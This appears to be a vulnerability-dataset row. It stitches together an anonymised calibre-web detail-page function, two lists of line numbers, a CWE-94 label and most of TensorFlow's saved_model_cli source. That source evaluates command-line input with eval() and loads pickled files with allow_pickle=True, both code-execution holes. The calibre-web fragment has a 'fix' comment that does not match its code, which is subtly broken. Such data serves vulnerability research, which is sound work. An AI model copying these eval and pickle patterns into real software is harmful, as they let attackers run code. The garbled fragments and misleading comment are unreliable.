    """Render the detail page for book VAR_5: shelves, read/archived state,
    send-to-kindle and reader availability, and audio formats."""
    VAR_63 = calibre_db.get_filtered_book(VAR_5, allow_show_archived=True)
    if VAR_63:
        for FUNC_31 in range(0, len(VAR_63.languages)):
            VAR_63.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), VAR_63.languages[
                FUNC_31].lang_code)
        VAR_16 = get_cc_columns(filter_config_custom_read=True)
        VAR_118 = []
        VAR_119 = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_5).all()
        for entry in VAR_119:
            VAR_118.append(entry.shelf)
        if not VAR_87.is_anonymous:
            if not config.config_read_column:
                # Read state tracked in the app database.
                VAR_146 = ub.session.query(ub.ReadBook). \
                    filter(and_(ub.ReadBook.user_id == int(VAR_87.id), ub.ReadBook.book_id == VAR_5)).all()
                VAR_142 = len(
                    VAR_146) > 0 and VAR_146[0].read_status == ub.ReadBook.STATUS_FINISHED
            else:
                # Read state tracked in a calibre custom column.
                try:
                    VAR_146 = getattr(VAR_63, 'custom_column_' + str(config.config_read_column))
                    VAR_142 = len(VAR_146) > 0 and VAR_146[0].value
                except (KeyError, AttributeError):
                    VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
                    VAR_142 = None
            VAR_54 = ub.session.query(ub.ArchivedBook). \
                filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
                            ub.ArchivedBook.book_id == VAR_5)).first()
            VAR_141 = VAR_54 and VAR_54.is_archived
        else:
            VAR_142 = None
            VAR_141 = None
        VAR_63.tags = VAR_7(VAR_63.tags, key=lambda tag: tag.name)
        VAR_63 = calibre_db.order_authors(VAR_63)
        VAR_120 = check_send_to_kindle(VAR_63)
        VAR_121 = check_read_formats(VAR_63)
        VAR_122 = []
        for media_format in VAR_63.data:
            if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
                VAR_122.append(media_format.format.lower())
        # Fix: the keyword values below previously referenced undefined names
        # (audioentries, cc, have_read, is_archived, kindle_list, reader_list)
        # instead of the locals computed above, raising NameError at runtime.
        return render_title_template('detail.html',
                                     entry=VAR_63,
                                     VAR_122=VAR_122,
                                     VAR_16=VAR_16,
                                     is_xhr=request.headers.get('X-Requested-With') == 'XMLHttpRequest',
                                     VAR_149=VAR_63.title,
                                     books_shelfs=VAR_118,
                                     VAR_142=VAR_142,
                                     VAR_141=VAR_141,
                                     VAR_120=VAR_120,
                                     VAR_121=VAR_121,
                                     VAR_9="book")
    else:
        VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
        flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
43,
45,
48,
60,
66,
73,
78,
83,
84,
94,
96,
99,
100,
101,
102,
103,
110,
112,
113,
120,
122,
123,
124,
125,
131,
132,
143,
151,
152,
196,
211,
212,
225,
226,
246,
251,
264,
277,
278,
279,
280,
281,
286,
287,
292,
293,
298,
299,
304,
305,
318,
319,
344,
345,
373,
374,
421,
422,
432,
437,
438,
447,
473,
474,
486,
507,
508,
526,
532,
536,
537,
552,
553,
565,
566,
578,
579,
591,
592,
607,
608,
614,
615,
616,
617,
618,
619,
620,
621,
622,
629,
630,
668,
680,
681,
691,
693,
699,
704,
705,
707,
735,
736,
749,
750,
751,
752,
753,
760,
761,
769,
770,
777,
788,
812,
814,
826,
831,
832,
833,
834,
835,
836,
839,
843,
847,
848,
860,
861,
878,
879,
887,
907,
908,
929,
930,
957,
963,
964,
983,
984,
1004,
1005,
1013,
1015,
1016,
1017,
1018,
1019,
1023,
1024,
1025,
1026,
1035,
1036,
1057,
1058,
1059,
1060,
1061,
1065,
1069,
1070,
1075,
1076,
1077,
1078,
1091,
1092,
1103,
1104,
1132,
1133,
1143,
1144,
1153,
1154,
1181,
1182,
1189,
1190,
1197,
1198,
1205,
1212,
1263,
1266,
1267,
1271,
1277,
1278,
1284,
1300,
1324,
1325,
1356,
1359,
1360,
1366,
1384,
1385,
1386,
1390,
1393,
1394,
1395,
1396,
1397,
1402,
1406,
1439,
1440,
1448,
1449,
1471,
1472,
1473,
1474,
1475,
1485,
1498,
1523,
1527,
1528,
1531,
1532,
1533,
1593,
1603,
1604,
1615,
1616,
1617,
1631,
1639,
1652,
1660,
1673,
1674,
1687,
1700,
1701,
1702,
1703,
1704,
1714,
1715,
1754,
1755,
1764,
1765,
1766,
1767,
1768,
1769,
1775,
1789,
1794,
1798,
1800,
1802,
1805,
1810,
1828
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
43,
45,
48,
60,
66,
73,
78,
83,
84,
95,
98,
99,
100,
101,
102,
109,
111,
112,
119,
121,
122,
123,
124,
130,
131,
142,
150,
151,
195,
210,
211,
224,
225,
245,
250,
263,
276,
277,
278,
279,
280,
285,
286,
291,
292,
297,
298,
303,
304,
317,
318,
343,
344,
372,
373,
420,
421,
431,
436,
437,
446,
472,
473,
485,
506,
507,
525,
531,
535,
536,
551,
552,
564,
565,
577,
578,
590,
591,
606,
607,
613,
614,
615,
616,
617,
618,
619,
620,
621,
628,
629,
667,
679,
680,
690,
692,
698,
703,
704,
706,
734,
735,
748,
749,
750,
751,
752,
759,
760,
768,
769,
776,
787,
811,
813,
825,
830,
831,
832,
833,
834,
835,
838,
842,
846,
847,
859,
860,
877,
878,
886,
906,
907,
928,
929,
956,
962,
963,
982,
983,
1003,
1004,
1012,
1014,
1015,
1016,
1017,
1018,
1022,
1023,
1024,
1025,
1034,
1035,
1056,
1057,
1058,
1059,
1060,
1064,
1068,
1069,
1074,
1075,
1076,
1077,
1090,
1091,
1102,
1103,
1131,
1132,
1142,
1143,
1152,
1153,
1180,
1181,
1188,
1189,
1196,
1197,
1204,
1211,
1262,
1265,
1266,
1270,
1276,
1277,
1283,
1299,
1323,
1324,
1355,
1358,
1359,
1365,
1383,
1384,
1385,
1389,
1392,
1393,
1394,
1395,
1396,
1401,
1405,
1438,
1439,
1447,
1448,
1470,
1471,
1472,
1473,
1474,
1484,
1497,
1522,
1526,
1527,
1530,
1531,
1532,
1592,
1602,
1603,
1614,
1615,
1616,
1630,
1638,
1651,
1659,
1672,
1673,
1686,
1699,
1700,
1701,
1702,
1703,
1713,
1714,
1753,
1754,
1763,
1764,
1765,
1766,
1767,
1768,
1774,
1788,
1793,
1797,
1799,
1801,
1804,
1809,
1827
] |
5CWE-94
| # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Command-line interface to inspect and execute a graph in a SavedModel.
For detailed usages and examples, please refer to:
https://www.tensorflow.org/guide/saved_model#cli_to_inspect_and_execute_savedmodel
"""
import argparse
import os
import re
import sys
from absl import app # pylint: disable=unused-import
import numpy as np
import six
from tensorflow.core.example import example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import save
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.tools import saved_model_aot_compile
from tensorflow.python.tools import saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
_XLA_DEBUG_OPTIONS_URL = (
'https://github.com/tensorflow/tensorflow/blob/master/'
'tensorflow/compiler/xla/debug_options_flags.cc')
# Set of ops to denylist.
_OP_DENYLIST = set(['WriteFile', 'ReadFile', 'PrintV2'])
def _show_tag_sets(saved_model_dir):
  """Print every MetaGraph tag-set stored in a SavedModel directory.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
  """
  all_tag_sets = saved_model_utils.get_saved_model_tag_sets(saved_model_dir)
  print('The given SavedModel contains the following tag-sets:')
  for one_tag_set in sorted(all_tag_sets):
    print('%r' % ', '.join(sorted(one_tag_set)))
def _show_signature_def_map_keys(saved_model_dir, tag_set):
  """Print the SignatureDef keys of the MetaGraphDef selected by `tag_set`.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
    tag_set: Comma-separated tags identifying the MetaGraphDef; for a tag-set
      with multiple tags, all tags must be passed in.
  """
  signature_keys = sorted(
      get_signature_def_map(saved_model_dir, tag_set).keys())
  print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
        'following keys:')
  for one_key in signature_keys:
    print('SignatureDef key: \"%s\"' % one_key)
def _get_inputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfo for all inputs of the SignatureDef.
Returns a dictionary that maps each input key to its TensorInfo for the given
signature_def_key in the meta_graph_def
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDef map to
look up SignatureDef key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps input tensor keys to TensorInfos.
Raises:
ValueError if `signature_def_key` is not found in the MetaGraphDef.
"""
if signature_def_key not in meta_graph_def.signature_def:
raise ValueError(
f'Could not find signature "{signature_def_key}". Please choose from: '
f'{", ".join(meta_graph_def.signature_def.keys())}')
return meta_graph_def.signature_def[signature_def_key].inputs
def _get_outputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfos for all outputs of the SignatureDef.
Returns a dictionary that maps each output key to its TensorInfo for the given
signature_def_key in the meta_graph_def.
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDefmap to
look up signature_def_key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps output tensor keys to TensorInfos.
"""
return meta_graph_def.signature_def[signature_def_key].outputs
def _show_inputs_outputs(saved_model_dir, tag_set, signature_def_key, indent=0):
  """Print the input and output TensorInfos of one SignatureDef.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
    tag_set: Comma-separated tags identifying the MetaGraphDef; for a tag-set
      with multiple tags, all tags must be passed in.
    signature_def_key: A SignatureDef key string.
    indent: How far (in increments of 2 spaces) to indent each line of output.
  """
  meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
                                                        tag_set)
  indent_str = ' ' * indent

  def in_print(s):
    print(indent_str + s)

  in_print('The given SavedModel SignatureDef contains the following input(s):')
  for key, tensor in sorted(
      _get_inputs_tensor_info_from_meta_graph_def(
          meta_graph_def, signature_def_key).items()):
    in_print(' inputs[\'%s\'] tensor_info:' % key)
    _print_tensor_info(tensor, indent + 1)

  in_print('The given SavedModel SignatureDef contains the following '
           'output(s):')
  for key, tensor in sorted(
      _get_outputs_tensor_info_from_meta_graph_def(
          meta_graph_def, signature_def_key).items()):
    in_print(' outputs[\'%s\'] tensor_info:' % key)
    _print_tensor_info(tensor, indent + 1)

  in_print('Method name is: %s' %
           meta_graph_def.signature_def[signature_def_key].method_name)
def _show_defined_functions(saved_model_dir):
  """Prints the callable concrete and polymorphic functions of the Saved Model.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
  """
  meta_graphs = saved_model_utils.read_saved_model(saved_model_dir).meta_graphs
  # Only TF2-style SavedModels carry an object graph; skip the (expensive)
  # load entirely for TF1 models, which define no trackable functions.
  has_object_graph_def = False
  for meta_graph_def in meta_graphs:
    has_object_graph_def |= meta_graph_def.HasField('object_graph_def')
  if not has_object_graph_def:
    return
  # Load inside a fresh graph so inspection does not pollute the default graph.
  with ops_lib.Graph().as_default():
    trackable_object = load.load(saved_model_dir)

  print('\nDefined Functions:', end='')
  # NOTE(review): relies on TF-internal protected APIs (_AugmentedGraphView,
  # _list_all_concrete_functions_for_serialization); these may change between
  # TF releases.
  functions = (
      save._AugmentedGraphView(trackable_object)  # pylint: disable=protected-access
      .list_functions(trackable_object))
  functions = sorted(functions.items(), key=lambda x: x[0])
  for name, function in functions:
    print('\n Function Name: \'%s\'' % name)
    # Collect every concrete specialization of this (possibly polymorphic)
    # function so each callable signature can be printed below.
    concrete_functions = []
    if isinstance(function, defun.ConcreteFunction):
      concrete_functions.append(function)
    if isinstance(function, def_function.Function):
      concrete_functions.extend(
          function._list_all_concrete_functions_for_serialization())  # pylint: disable=protected-access
    concrete_functions = sorted(concrete_functions, key=lambda x: x.name)
    for index, concrete_function in enumerate(concrete_functions, 1):
      args, kwargs = None, None
      if concrete_function.structured_input_signature:
        args, kwargs = concrete_function.structured_input_signature
      elif concrete_function._arg_keywords:  # pylint: disable=protected-access
        # For pure ConcreteFunctions we might have nothing better than
        # _arg_keywords.
        args = concrete_function._arg_keywords  # pylint: disable=protected-access
      if args:
        print(' Option #%d' % index)
        print(' Callable with:')
        _print_args(args, indent=4)
      if kwargs:
        _print_args(kwargs, 'Named Argument', indent=4)
def _print_args(arguments, argument_type='Argument', indent=0):
  """Formats and prints the argument of the concrete functions defined in the model.

  Args:
    arguments: Arguments to format print.
    argument_type: Type of arguments.
    indent: How far (in increments of 2 spaces) to indent each line of
      output.
  """
  indent_str = ' ' * indent

  def _maybe_add_quotes(value):
    # Wrap string values in quotes so the printed example reads as a valid
    # Python literal; non-strings get an empty prefix/suffix.
    is_quotes = '\'' * isinstance(value, str)
    return is_quotes + str(value) + is_quotes

  def in_print(s, end='\n'):
    print(indent_str + s, end=end)

  for index, element in enumerate(arguments, 1):
    if indent == 4:
      # Only label individual arguments at the top nesting level.
      in_print('%s #%d' % (argument_type, index))
    if isinstance(element, six.string_types):
      in_print(' %s' % element)
    elif isinstance(element, tensor_spec.TensorSpec):
      print((indent + 1) * ' ' + '%s: %s' % (element.name, repr(element)))
    elif (isinstance(element, collections_abc.Iterable) and
          not isinstance(element, dict)):
      in_print(' DType: %s' % type(element).__name__)
      in_print(' Value: [', end='')
      for value in element:
        print('%s' % _maybe_add_quotes(value), end=', ')
      # '\b\b' backspaces over the trailing ', ' before closing the bracket.
      print('\b\b]')
    elif isinstance(element, dict):
      in_print(' DType: %s' % type(element).__name__)
      in_print(' Value: {', end='')
      for (key, value) in element.items():
        print('\'%s\': %s' % (str(key), _maybe_add_quotes(value)), end=', ')
      print('\b\b}')
    else:
      in_print(' DType: %s' % type(element).__name__)
      in_print(' Value: %s' % str(element))
def _print_tensor_info(tensor_info, indent=0):
  """Print dtype, shape, and name of a single TensorInfo.

  Args:
    tensor_info: TensorInfo object to be printed.
    indent: How far (in increments of 2 spaces) to indent each line output
  """
  indent_str = ' ' * indent

  def in_print(s):
    print(indent_str + s)

  dtype_name = {value: key
                for (key, value) in types_pb2.DataType.items()}[tensor_info.dtype]
  in_print(' dtype: ' + dtype_name)
  # Display shape as tuple.
  if tensor_info.tensor_shape.unknown_rank:
    shape = 'unknown_rank'
  else:
    shape = '(%s)' % ', '.join(
        str(dim.size) for dim in tensor_info.tensor_shape.dim)
  in_print(' shape: ' + shape)
  in_print(' name: ' + tensor_info.name)
def _show_all(saved_model_dir):
  """Print every tag-set, SignatureDef and its inputs/outputs of a SavedModel.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
  """
  for one_tag_set in sorted(
      saved_model_utils.get_saved_model_tag_sets(saved_model_dir)):
    print("\nMetaGraphDef with tag-set: '%s' "
          "contains the following SignatureDefs:" % ', '.join(one_tag_set))
    tag_set = ','.join(one_tag_set)
    for signature_def_key in sorted(
        get_signature_def_map(saved_model_dir, tag_set).keys()):
      print('\nsignature_def[\'' + signature_def_key + '\']:')
      _show_inputs_outputs(saved_model_dir, tag_set, signature_def_key,
                           indent=1)
  _show_defined_functions(saved_model_dir)
def get_meta_graph_def(saved_model_dir, tag_set):
  """DEPRECATED: Use saved_model_utils.get_meta_graph_def instead.

  Thin compatibility wrapper that resolves the MetaGraphDef matching the
  given tag-set in a SavedModel directory.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect or execute.
    tag_set: Comma-separated tags identifying the MetaGraphDef to load; for a
      tag-set with multiple tags, all tags must be passed in.

  Raises:
    RuntimeError: An error when the given tag-set does not exist in the
      SavedModel.

  Returns:
    A MetaGraphDef corresponding to the tag-set.
  """
  meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
                                                        tag_set)
  return meta_graph_def
def get_signature_def_map(saved_model_dir, tag_set):
  """Return the SignatureDef map of one MetaGraphDef in a SavedModel.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect or execute.
    tag_set: Comma-separated tags identifying the MetaGraphDef holding the
      SignatureDef map; for a tag-set with multiple tags, all tags must be
      passed in.

  Returns:
    A SignatureDef map that maps from string keys to SignatureDefs.
  """
  return saved_model_utils.get_meta_graph_def(
      saved_model_dir, tag_set).signature_def
def scan_meta_graph_def(meta_graph_def):
  """Scan a MetaGraphDef and report any ops that appear on the denylist.

  Prints the offending ops when found, otherwise prints that the graph is
  clean.

  Args:
    meta_graph_def: MetaGraphDef protocol buffer.
  """
  used_ops = set(
      meta_graph_lib.ops_used_by_graph_def(meta_graph_def.graph_def))
  found_ops = _OP_DENYLIST & used_ops
  if found_ops:
    # TODO(yifeif): print more warnings
    print(
        'MetaGraph with tag set %s contains the following denylisted ops:' %
        meta_graph_def.meta_info_def.tags, found_ops)
  else:
    print('MetaGraph with tag set %s does not contain denylisted ops.' %
          meta_graph_def.meta_info_def.tags)
def run_saved_model_with_feed_dict(saved_model_dir, tag_set, signature_def_key,
                                   input_tensor_key_feed_dict, outdir,
                                   overwrite_flag, worker=None, init_tpu=False,
                                   tf_debug=False):
  """Runs SavedModel and fetch all outputs.

  Runs the input dictionary through the MetaGraphDef within a SavedModel
  specified by the given tag_set and SignatureDef. Also save the outputs to file
  if outdir is not None.

  Args:
    saved_model_dir: Directory containing the SavedModel to execute.
    tag_set: Group of tag(s) of the MetaGraphDef with the SignatureDef map, in
      string format, separated by ','. For tag-set contains multiple tags, all
      tags must be passed in.
    signature_def_key: A SignatureDef key string.
    input_tensor_key_feed_dict: A dictionary maps input keys to numpy ndarrays.
    outdir: A directory to save the outputs to. If the directory doesn't exist,
      it will be created.
    overwrite_flag: A boolean flag to allow overwrite output file if file with
      the same name exists.
    worker: If provided, the session will be run on the worker. Valid worker
      specification is a bns or gRPC path.
    init_tpu: If true, the TPU system will be initialized after the session
      is created.
    tf_debug: A boolean flag to use TensorFlow Debugger (TFDBG) to observe the
      intermediate Tensor values and runtime GraphDefs while running the
      SavedModel.

  Raises:
    ValueError: When any of the input tensor keys is not valid.
    RuntimeError: An error when output file already exists and overwrite is not
      enabled.
  """
  # Get a list of output tensor names.
  meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
                                                        tag_set)

  # Re-create feed_dict based on input tensor name instead of key as session.run
  # uses tensor name.
  inputs_tensor_info = _get_inputs_tensor_info_from_meta_graph_def(
      meta_graph_def, signature_def_key)

  # Check if input tensor keys are valid. Fail up-front, before creating a
  # session, so a typo in an input key produces a clear error message.
  for input_key_name in input_tensor_key_feed_dict.keys():
    if input_key_name not in inputs_tensor_info:
      raise ValueError(
          '"%s" is not a valid input key. Please choose from %s, or use '
          '--show option.' %
          (input_key_name, '"' + '", "'.join(inputs_tensor_info.keys()) + '"'))

  # Map each user-supplied key to the underlying graph tensor name.
  inputs_feed_dict = {
      inputs_tensor_info[key].name: tensor
      for key, tensor in input_tensor_key_feed_dict.items()
  }
  # Get outputs
  outputs_tensor_info = _get_outputs_tensor_info_from_meta_graph_def(
      meta_graph_def, signature_def_key)
  # Sort to preserve order because we need to go from value to key later.
  output_tensor_keys_sorted = sorted(outputs_tensor_info.keys())
  output_tensor_names_sorted = [
      outputs_tensor_info[tensor_key].name
      for tensor_key in output_tensor_keys_sorted
  ]

  with session.Session(worker, graph=ops_lib.Graph()) as sess:
    if init_tpu:
      print('Initializing TPU System ...')
      # This is needed for freshly started worker, or if the job
      # restarts after a preemption.
      sess.run(tpu.initialize_system())

    loader.load(sess, tag_set.split(','), saved_model_dir)

    if tf_debug:
      # Wrap the session so TFDBG can intercept run() calls.
      sess = local_cli_wrapper.LocalCLIDebugWrapperSession(sess)

    outputs = sess.run(output_tensor_names_sorted, feed_dict=inputs_feed_dict)

    # Results come back in the same order as output_tensor_names_sorted, so
    # index i maps back to output_tensor_keys_sorted[i].
    for i, output in enumerate(outputs):
      output_tensor_key = output_tensor_keys_sorted[i]
      print('Result for output key %s:\n%s' % (output_tensor_key, output))

      # Only save if outdir is specified.
      if outdir:
        # Create directory if outdir does not exist
        if not os.path.isdir(outdir):
          os.makedirs(outdir)
        output_full_path = os.path.join(outdir, output_tensor_key + '.npy')

        # If overwrite not enabled and file already exist, error out
        if not overwrite_flag and os.path.exists(output_full_path):
          raise RuntimeError(
              'Output file %s already exists. Add \"--overwrite\" to overwrite'
              ' the existing output files.' % output_full_path)

        np.save(output_full_path, output)
        print('Output %s is saved to %s' % (output_tensor_key,
                                            output_full_path))
def preprocess_inputs_arg_string(inputs_str):
  """Parses input arg into dictionary that maps input to file/variable tuple.

  Parses input string in the format of, for example,
  "input1=filename1[variable_name1],input2=filename2" into a
  dictionary looks like
  {'input_key1': (filename1, variable_name1),
   'input_key2': (file2, None)}
  , which maps input keys to a tuple of file name and variable name(None if
  empty).

  Args:
    inputs_str: A string that specified where to load inputs. Inputs are
      separated by semicolons.
      * For each input key:
          '<input_key>=<filename>' or
          '<input_key>=<filename>[<variable_name>]'
      * The optional 'variable_name' key will be set to None if not specified.

  Returns:
    A dictionary that maps input keys to a tuple of file name and variable name.

  Raises:
    RuntimeError: An error when the given input string is in a bad format.
  """
  parsed_inputs = {}
  for spec in filter(bool, inputs_str.split(';')):  # skip empty strings
    # Try the bracketed form first: input=filename[variable_name]
    bracketed = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', spec)
    if bracketed:
      parsed_inputs[bracketed.group(1)] = (bracketed.group(2),
                                           bracketed.group(3))
      continue
    # Fall back to the plain form: input=filename
    plain = re.match(r'([^=]+)=([^\[\]]+)$', spec)
    if plain is None:
      raise RuntimeError(
          '--inputs "%s" format is incorrect. Please follow'
          '"<input_key>=<filename>", or'
          '"<input_key>=<filename>[<variable_name>]"' % spec)
    parsed_inputs[plain.group(1)] = (plain.group(2), None)
  return parsed_inputs
def preprocess_input_exprs_arg_string(input_exprs_str):
  """Parses input arg into dictionary that maps input key to python expression.

  Parses input string in the format of 'input_key=<python expression>' into a
  dictionary that maps each input_key to its python expression.

  Args:
    input_exprs_str: A string that specifies python expression for input keys.
      Each input is separated by semicolon. For each input key:
        'input_key=<python expression>'

  Returns:
    A dictionary that maps input keys to their values.

  Raises:
    RuntimeError: An error when the given input string is in a bad format.
  """
  input_dict = {}
  for input_raw in filter(bool, input_exprs_str.split(';')):
    # Validate each item individually. The previous check tested the whole
    # input_exprs_str, so a malformed item such as 'a=1;b' slipped through and
    # crashed with an unrelated unpacking ValueError instead of this error.
    if '=' not in input_raw:
      raise RuntimeError('--input_exprs "%s" format is incorrect. Please follow'
                         '"<input_key>=<python expression>"' % input_raw)
    input_key, expr = input_raw.split('=', 1)
    # ast.literal_eval does not work with numpy expressions, so eval() is used
    # deliberately here.
    # SECURITY NOTE: eval() executes arbitrary Python supplied on the command
    # line; this tool must only be run with expressions the user trusts.
    input_dict[input_key] = eval(expr)  # pylint: disable=eval-used
  return input_dict
def preprocess_input_examples_arg_string(input_examples_str):
  """Parses input into dict that maps input keys to lists of tf.Example.

  Parses input string in the format of 'input_key1=[{feature_name:
  feature_list}];input_key2=[{feature_name:feature_list}];' into a dictionary
  that maps each input_key to its list of serialized tf.Example.

  Args:
    input_examples_str: A string that specifies a list of dictionaries of
      feature_names and their feature_lists for each input.
      Each input is separated by semicolon. For each input key:
        'input=[{feature_name1: feature_list1, feature_name2:feature_list2}]'
      items in feature_list can be the type of float, int, long or str.

  Returns:
    A dictionary that maps input keys to lists of serialized tf.Example.

  Raises:
    ValueError: An error when the given tf.Example is not a list.
  """
  # Reuse the expression parser, then serialize each example dictionary.
  parsed = preprocess_input_exprs_arg_string(input_examples_str)
  for key, example_dicts in parsed.items():
    if not isinstance(example_dicts, list):
      raise ValueError(
          'tf.Example input must be a list of dictionaries, but "%s" is %s' %
          (example_dicts, type(example_dicts)))
    parsed[key] = [_create_example_string(d) for d in example_dicts]
  return parsed
def _create_example_string(example_dict):
  """Builds a serialized tf.Example proto from a feature dictionary.

  Each dict entry maps a feature name to a list of values; the value type of
  the first element selects the proto list (float/bytes/int64) to populate.
  """
  example = example_pb2.Example()
  for name, values in example_dict.items():
    if not isinstance(values, list):
      raise ValueError('feature value must be a list, but %s: "%s" is %s' %
                       (name, values, type(values)))
    sample = values[0]
    feature = example.features.feature[name]
    if isinstance(sample, float):
      feature.float_list.value.extend(values)
    elif isinstance(sample, str):
      # Strings are stored UTF-8 encoded in the bytes list.
      feature.bytes_list.value.extend([v.encode('utf8') for v in values])
    elif isinstance(sample, bytes):
      feature.bytes_list.value.extend(values)
    elif isinstance(sample, six.integer_types):
      feature.int64_list.value.extend(values)
    else:
      raise ValueError(
          'Type %s for value %s is not supported for tf.train.Feature.' %
          (type(sample), sample))
  return example.SerializeToString()
def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,
                                      input_examples_str):
  """Parses input arg strings and create inputs feed_dict.

  Parses '--inputs' string for inputs to be loaded from file, and parses
  '--input_exprs' string for inputs to be evaluated from python expression.
  '--input_examples' string for inputs to be created from tf.example feature
  dictionary list.

  Args:
    inputs_str: A string that specified where to load inputs. Each input is
      separated by semicolon.
      * For each input key:
        '<input_key>=<filename>' or
        '<input_key>=<filename>[<variable_name>]'
      * The optional 'variable_name' key will be set to None if not specified.
      * File specified by 'filename' will be loaded using numpy.load. Inputs
          can be loaded from only .npy, .npz or pickle files.
      * The "[variable_name]" key is optional depending on the input file type
          as descripted in more details below.
      When loading from a npy file, which always contains a numpy ndarray, the
      content will be directly assigned to the specified input tensor. If a
      variable_name is specified, it will be ignored and a warning will be
      issued.
      When loading from a npz zip file, user can specify which variable within
      the zip file to load for the input tensor inside the square brackets. If
      nothing is specified, this function will check that only one file is
      included in the zip and load it for the specified input tensor.
      When loading from a pickle file, if no variable_name is specified in the
      square brackets, whatever that is inside the pickle file will be passed
      to the specified input tensor, else SavedModel CLI will assume a
      dictionary is stored in the pickle file and the value corresponding to
      the variable_name will be used.
    input_exprs_str: A string that specifies python expressions for inputs.
      * In the format of: '<input_key>=<python expression>'.
      * numpy module is available as np.
    input_examples_str: A string that specifies tf.Example with dictionary.
      * In the format of: '<input_key>=<[{feature:value list}]>'

  Returns:
    A dictionary that maps input tensor keys to numpy ndarrays.

  Raises:
    RuntimeError: An error when a key is specified, but the input file contains
      multiple numpy ndarrays, none of which matches the given key.
    RuntimeError: An error when no key is specified, but the input file contains
      more than one numpy ndarrays.
  """
  tensor_key_feed_dict = {}

  inputs = preprocess_inputs_arg_string(inputs_str)
  input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)
  input_examples = preprocess_input_examples_arg_string(input_examples_str)

  for input_tensor_key, (filename, variable_name) in inputs.items():
    # NOTE(review): allow_pickle=True lets numpy deserialize arbitrary pickled
    # objects from the file — the input file must be trusted.
    data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True)  # pylint: disable=unexpected-keyword-arg

    # When a variable_name key is specified for the input file
    if variable_name:
      # if file contains a single ndarray, ignore the input name
      if isinstance(data, np.ndarray):
        logging.warn(
            'Input file %s contains a single ndarray. Name key \"%s\" ignored.'
            % (filename, variable_name))
        tensor_key_feed_dict[input_tensor_key] = data
      else:
        # data is dict-like (npz archive or a pickled dict); look up the key.
        if variable_name in data:
          tensor_key_feed_dict[input_tensor_key] = data[variable_name]
        else:
          raise RuntimeError(
              'Input file %s does not contain variable with name \"%s\".' %
              (filename, variable_name))
    # When no key is specified for the input file.
    else:
      # Check if npz file only contains a single numpy ndarray.
      if isinstance(data, np.lib.npyio.NpzFile):
        variable_name_list = data.files
        if len(variable_name_list) != 1:
          raise RuntimeError(
              'Input file %s contains more than one ndarrays. Please specify '
              'the name of ndarray to use.' % filename)
        tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]
      else:
        tensor_key_feed_dict[input_tensor_key] = data

  # When input is a python expression:
  # --input_exprs overrides --inputs on duplicate keys (with a warning).
  for input_tensor_key, py_expr_evaluated in input_exprs.items():
    if input_tensor_key in tensor_key_feed_dict:
      logging.warn(
          'input_key %s has been specified with both --inputs and --input_exprs'
          ' options. Value in --input_exprs will be used.' % input_tensor_key)
    tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated

  # When input is a tf.Example:
  # --input_examples has the highest precedence on duplicate keys.
  for input_tensor_key, example in input_examples.items():
    if input_tensor_key in tensor_key_feed_dict:
      logging.warn(
          'input_key %s has been specified in multiple options. Value in '
          '--input_examples will be used.' % input_tensor_key)
    tensor_key_feed_dict[input_tensor_key] = example

  return tensor_key_feed_dict
def show(args):
  """Function triggered by show command.

  Dispatches to the appropriate _show_* helper based on how specific the
  command-line request is (everything, tag-sets, signature keys, or one
  signature's tensors).

  Args:
    args: A namespace parsed from command line.
  """
  # --all: dump every piece of information in the SavedModel.
  if args.all:
    _show_all(args.dir)
    return
